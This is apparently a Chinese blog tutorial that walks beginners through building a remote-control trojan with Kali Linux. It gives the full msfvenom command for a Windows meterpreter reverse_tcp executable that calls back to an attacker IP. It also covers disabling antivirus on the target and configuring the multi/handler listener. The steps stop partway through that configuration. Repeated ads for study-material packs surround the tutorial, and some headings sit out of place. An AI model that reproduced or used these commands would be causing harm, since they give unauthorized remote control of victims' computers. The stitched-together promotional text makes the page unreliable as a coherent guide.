网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。

最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。

最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！下面就开始进入正题，如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图，这里我给大家分享一份打磨了3个月，已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战，这里带来的是SRC资料&HW资料，毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底，我们的最终目的都是为了就业，所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过！

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

五、建议

---

前言

**相关法律声明：《中华人民共和国网络安全法》**第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

本文仅用于学习用途，读者应当不传播病毒以及做一些危害公共安全的行为，若读者利用所学对公共安全产生危害则与本人无关。

实验之前需要准备好的东西：1.安装好kali Linux        2.设置好靶机(可以是虚拟机/物理机)        3.保证攻击机和靶机之间能够ping通        4.本次生成的木马比较简单，所以需要关闭一些杀毒程序

总的来说：分为以下步骤        1.生成木马        2.将木马传播到靶机        3.在攻击机中配置攻击模块        4.进行远程控制

一、生成远控木马

输入命令:sudo su

输入命令:msfconsole

输入命令：msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe

参数含义：-p:payload        -f:format        -o:output

运行结果如下：

查看病毒：

二、传播木马（现实中通过免杀技术进行传播，此文章为新手入门教程，故通过关闭杀毒程序的方法让初学者熟悉流程）

1.关闭杀毒程序

杀毒程序包括一些杀毒软件以及电脑本身的防毒程序

因为杀毒软件五花八门所以读者门自行研究关闭，这里只演示电脑本身的杀毒程序的关闭

tips:新手阶段一般都用windows7，因为其漏洞比较多，一般不需要关闭电脑原有的杀毒程序，win10以上一般都需要关闭杀毒程序

步骤如下：

完成以上步骤之后就可以将生成的木马放到虚拟机上的靶机或者物理机上（随便放到哪里都行）

tips:要在虚拟机和物理机上传输文件的话，需要利用文件传输工具或者下载VMware tools,具体方法这里就不介绍了

三、配置攻击模块

输入命令：use exploit/multi/handler

输入命令:show options

下图为输入show option之后的结果:

正式配置：

输入命令:set payload windows/x64/meterpreter/reverse_tcp

设置模块的载荷

输入命令:set lhost 192.168.10.147

设置攻击机的ip地址，该ip地址为读者所使用的Kali Linux的地址

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！